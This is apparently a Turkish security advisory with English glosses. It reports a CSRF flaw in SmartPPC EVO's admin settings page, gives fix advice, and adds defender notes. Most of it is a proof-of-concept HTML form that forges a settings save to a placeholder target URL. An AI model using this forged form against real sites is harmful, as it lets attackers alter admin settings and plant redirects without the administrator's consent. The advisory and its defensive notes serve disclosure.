< ------------------- header data start ------------------- >

#############################################################

# Application Name : SmartPPC EVO

# Vulnerability Type : XSRF (cross-site request forgery, CSRF)

# Infection : Yönlendirme Kodu Atilabilir. (Impact: a redirect code can be injected.)

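# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. (Add a per-session token to the form and verify it on the server for every save; ask for the old password before the settings are changed.)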

# Demo : http://orbitscripts.com/products/smartppc/evo/admin/system_settings

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >


<!--
  Proof-of-concept form from the advisory. Its action is an absolute URL to the
  application's admin/system_settings endpoint; the host and path prefix
  (hedefsite.com/scriptyolu, Turkish for "target site / script path") are
  placeholders.
  Every field below is a fixed, predictable value (title, mail, signup, id,
  form_mode, active_form). None of them is a per-session anti-CSRF token, which
  is the defect the advisory reports: the save request carries nothing that
  proves it came from the application's own settings page.
  Defender notes: require an unpredictable token bound to the admin session and
  reject saves that lack it, and ask for the old password before saving (both
  per the advisory's fix advice). SameSite session cookies and an Origin/Referer
  check on this endpoint are additional layers. In web logs, POSTs to
  admin/system_settings whose Origin or Referer is a foreign site are worth
  reviewing.
-->
<form name=system_settings method=post action=http://hedefsite.com/scriptyolu/admin/system_settings>
<div class=frame p10 mb10>
<!-- title: the settings field that the advisory says can receive a redirect code; the value here is placeholder text ("Yonlendirme Kodu" = "redirect code"). -->
<input type=hidden id=st name=title class=text w200 value=Yonlendirme Kodu>
<!-- mail: the address appears as "[email protected]", presumably masked by the hosting page's e-mail obfuscation; the original value is not recoverable from this page. -->
<input type=hidden id=am name=mail class=text w200 value=[email protected]>
<input type=hidden id=as name=signup value=true checked/>
<!-- The only visible control: its onclick handler submits the form named system_settings. -->
<button class=button w200 title=Save onclick=document.system_settings.submit();>
<span class=ico ico-confirm>Buton Adi</span>
</button>
<!-- Static fields naming the record (id) and the save action/form (form_mode, active_form); a server-issued, per-session token would have to accompany these for the request to be distinguishable from a forged one. -->
<input type=hidden name=id value=1/>
<input type=hidden name=form_mode value=save/>
<input type=hidden name=active_form value=system_settings/>
</form>


< -- bug code end of -- >